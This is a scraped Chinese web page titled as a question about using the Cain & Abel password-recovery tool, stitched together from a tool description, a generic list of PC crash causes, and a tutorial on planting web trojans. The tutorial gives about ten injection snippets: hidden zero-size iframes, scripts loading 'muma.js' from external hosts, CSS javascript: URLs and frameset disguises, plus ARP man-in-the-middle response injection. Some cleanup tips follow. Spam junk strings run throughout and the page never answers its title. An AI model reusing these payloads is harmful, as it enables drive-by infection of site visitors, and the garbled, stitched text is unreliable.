cain&abel 怎么用啊

cain&abel 怎么用啊,第1张

Cain 是著名的 Windows 平台口令恢复工具。它能通过网络嗅探很容易的恢复多种口 令,能使用字典破解加密的口令,暴力口令破解,录音VoIP(IP电话)谈话内容,解码编 码化的口令,获取无线网络密钥,恢复缓存的口令,分析路由协议等。 系统组成 Cain &Abel 是两个程序。Cain 是图形界面主程序;Abel 是后台服务程序,由两个文 件组成:Abel.exe 和Abel.dll。 l 10MB 硬盘空间 l MicrosoftWindows2000/XP/2003 l Winpcap 包驱动 (V2.3 或以上;4.0版本支持AirPcap 网卡) l 程序由以下文件组成: cain.exe 主程序 CA_UserManual.chm 用户手册 Abel.exe 名为Abel 的可的Windows 服务 Abell.dll 程序支持文件 Wordlist.txt 小型口令文件 Instal.log 程序安装日志 oui.txt MAC 地址厂商文件 <安装目录>\winrtgen\winrtgen.exe 字典生成器 <安装目录>\winrtgen\charset.txt 字符集文件 <安装目录>\Driver\WinPcap_4_0_beta2.exe 原始Winpcap 驱动程序

1 内存条坏了 更换内存条

2 双内存不兼容 使用同品牌的内存或只要一条内存

3 内存质量问题 更换内存条

4 散热问题 加强机箱内部的散热

5 内存和主板没插好或其他硬件不兼容 重插内存或换个插槽

6 硬件有问题 更换硬盘

7 驱动问题 重装驱动,如果是新系统,应先安装主板驱动

8 软件损坏 重装软件

9 软件有BUG 打补丁或更新到最新版本

10 软件和系统不兼容 给软件打上补丁或是试试系统的兼容模式

11 软件和软件之间有冲突 如果最近安装了什么新软件,卸载了试试

12 软件要使用其他相关的软件有问题 重装相关软件,比如播放某一格式的文件时出错,可能是这个文件的解码器有问题

13 病毒问题 杀毒

14 杀毒软件与系统或软件相冲突 由于杀毒软件是进入底层监控系统的,可能与一些软件相冲突,卸载试试

15 系统本身有问题 有时候 *** 作系统本身也会有BUG,要注意安装官方发行的更新程序,象SP的补丁,最好打上.如果还不行,重装系统,或更换其他版本的系统。

祝你好运~~~

一:框架挂马浪漫之家社区门户.}8d{ocb

Z}x?\` sT-e0 <iframe src=地址 width=0 height=0></iframe>浪漫之家社区门户*f2iNFvtV$V

]-iXpQG+v$\0二:js文件挂马浪漫之家社区门户2D(D_3QU1a YS

T,UEsy(~ Q!i"K0 首先将以下代码浪漫之家社区门户XvK&DSs_ n

document.write("<iframe width='0' height='0' src='地址'></iframe>")浪漫之家社区门户7v1rWpv4E`

保存为xxx.js,

0]Q.E?N A0 则JS挂马代码为

xt].y4QfX0 <script language=javascript src=xxx.js></script>

(~+}Cy:R9ss0浪漫之家社区门户(rJ(E^5Z b|+p

三:js变形加密浪漫之家社区门户w4{7v~ Cj

浪漫之家社区门户gAub7\5Us

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>浪漫之家社区门户'IQWSv

muma.txt可改成任意后缀浪漫之家社区门户 aJ5~7sX]

四:body挂马浪漫之家社区门户LV3X"HVc?#[

7y0k9PZ&hn0 <body ></body>

0u yo.{\Za0浪漫之家社区门户M2cA Xo,[\,m

五:隐蔽挂马

P2@vj2\m}.LBf0浪漫之家社区门户bF9^c Ai[6\l k`

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.linglihu.com/"></iframe>'浪漫之家社区门户o1}"uC)u

浪漫之家社区门户'_g+N#` x'@$x

六:css中挂马浪漫之家社区门户^1c9|5T+E3A l `0R

.P:ZGz3qy`0 body {浪漫之家社区门户*]&N5b+S2d!k v!p%o

background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}浪漫之家社区门户9@ T{-jBQk:c*k i

8@mpE3Y-E+[o0七:JAJA挂马

^O7hzN0

El*V z{4Wz3lGs,?,D0 <SCRIPT language=javascript>

LX@2t B5j4xRL.~0 window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1")浪漫之家社区门户RoN {z]&J{A$}b[

</script>浪漫之家社区门户L0} N.Ii2x`P*GT+@

浪漫之家社区门户 A0h2l%|ekT

八:图片伪装

1x(lu.\1NE'p:sY0浪漫之家社区门户TfZ4L:VR_ U

<html>浪漫之家社区门户b8X%K"AZ?WAZ$y

<iframe src="网马地址" height=0 width=0></iframe>

g^M2c8Iqj/S0g0 <img src="图片地址"></center>浪漫之家社区门户#D5H!L Au cgU

</html>浪漫之家社区门户I8@J(j$hfI b

4p'kxc!jyhLtL0九:伪装调用:浪漫之家社区门户3n [?5j8HlA|

浪漫之家社区门户Pno.ND

<frameset rows="444,0" cols="*">浪漫之家社区门户2|6jm6W+C*h

<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

Jg({%E!v,~1v VN0 <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

E!|n#AQ'H/J F0 </frameset>浪漫之家社区门户*rB?D"wLE-zI n

浪漫之家社区门户4O&Cpi/W6gNM%rU

十:高级欺骗

`8A${,qi0

j w3dMu'}9Z0 <a href="http://www.linglihu.com(迷惑连接地址,显示这个地址指向木马地址)" >页面要显示的内容 </a>

_`!xA,B3e zt6TC0<SCRIPT Language="JavaScript">浪漫之家社区门户L%w~StQ-@5]S

function www_163_com ()浪漫之家社区门户O U7\%d Z7x

{浪漫之家社区门户%l4y"C)R&j-Re1g

var url="网马地址"

[}t0A&G0open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")浪漫之家社区门户 Wh!j+Hm`c

}浪漫之家社区门户)r5g#Sj7SB4^_

</SCRIPT>

:y&N~-a!^$?dd6E0浪漫之家社区门户u~E6KQD

十一: 超级网马—通过arp欺骗来直接挂马

:mhZ2F3r3r-z$s2O0

"YO8C^i$rl/].o0原理:arp中间人攻击,实际上相当于做了一次代理。浪漫之家社区门户]%DpqmFV?C8E7_F

浪漫之家社区门户:|3_j$@&aw.]?t

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机

7LI KTs0arp中间人攻击时候: A---->C---->B

gh|$[b N0B---->C---->A

iIqcO8v0实际上,C在这里做了一次代理的作用浪漫之家社区门户9lxbjEE9_3Xr r L

浪漫之家社区门户R.{*kT9Ui

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

8cd1bA j+v}0

p6j4xgv0如何处理网页木马:

.r:ej y}izC#i01、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

#c [:[}.caA ?4s)ax0浪漫之家社区门户C%qQ7Xd M-i8T,\ q

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...浪漫之家社区门户)qJXkHY)I

浪漫之家社区门户*@ L uIi

3、修改键值wm.htm为wm_nnd.htm。

/bX0e5I-`0浪漫之家社区门户R+jyC)wk8Kl,y

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。浪漫之家社区门户bQ[7~,\2P

cain.exe,据说是密码嗅探器。浪漫之家社区门户gG.px xa_C

8m9e"z5^!q)[8By8iYBA05、修改键值cain.exe为cain_nnd.exe。

`m+b3@ @-H0浪漫之家社区门户axU+p1n(J

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

M*UQ:\7Rc`B0浪漫之家社区门户U(F0Nu9W

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。浪漫之家社区门户}zj4x V2G

浪漫之家社区门户Vq0l:@Sri

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

vI4f J)L o)D0

'i G*E W*^a09、发现temp*.exe(全名记不清了),立马net stop server 。浪漫之家社区门户F{%\B7r a9eY

'W2IH9bP2MI:Oxkk010、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

0jW r7O C0

(j}y,w6G+Z011、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

Q(|%h,}t0

5VO\mW@y.Nn012、观察了几天,没再发生挂马的现象。 另外,通过检测网络连接查看服务器是否中了木马或病毒浪漫之家社区门户3\O] @n{r

浪漫之家社区门户I$@K9QN&S${/U

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

.gB1n dL(|H}0

(B.Qv1v%?2k+G X02、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。

7JrK5WE0浪漫之家社区门户"i \$J\ KI

3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下

1BKY-~#Bx8u@J#G0浪漫之家社区门户2@wQY5M

REM 注释:监控的时间

|)RUz!AX@0time /t>>Netstat.log浪漫之家社区门户L:vR9ZSum

REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件浪漫之家社区门户8| F {.f,p*H5f a]

Netstat -n -p tcp 30>>Netstat.log浪漫之家社区门户9LUgLM(X[%v

dA_"C_`!J+{0注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。浪漫之家社区门户y Bs}mZ\

浪漫之家社区门户e&f$J!@#k

仅仅这些还不够,说说更严重的:浪漫之家社区门户 nw!C~/@.k {bc_

6UM T%`3HQs8`m r01、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。浪漫之家社区门户i{${1}v1hd+r$E"ix

浪漫之家社区门户 j8o0~|`:~^"B&G

2、赶快检测系统帐户:

X!u'w Q7^*cJ(o&OH0a、在命令行下输入net user,查看计算机上有些什么用户。浪漫之家社区门户] t G.^ @T

b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。

9b)~~&x0?"l,Gru0c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,

E T/u/d%i#B1{u0 那么别人在你的计算机上克隆账户的概率为90%。浪漫之家社区门户*w}+g9B0\

d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/12073234.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-20
下一篇 2023-05-20

发表评论

登录后才能评论

评论列表(0条)

保存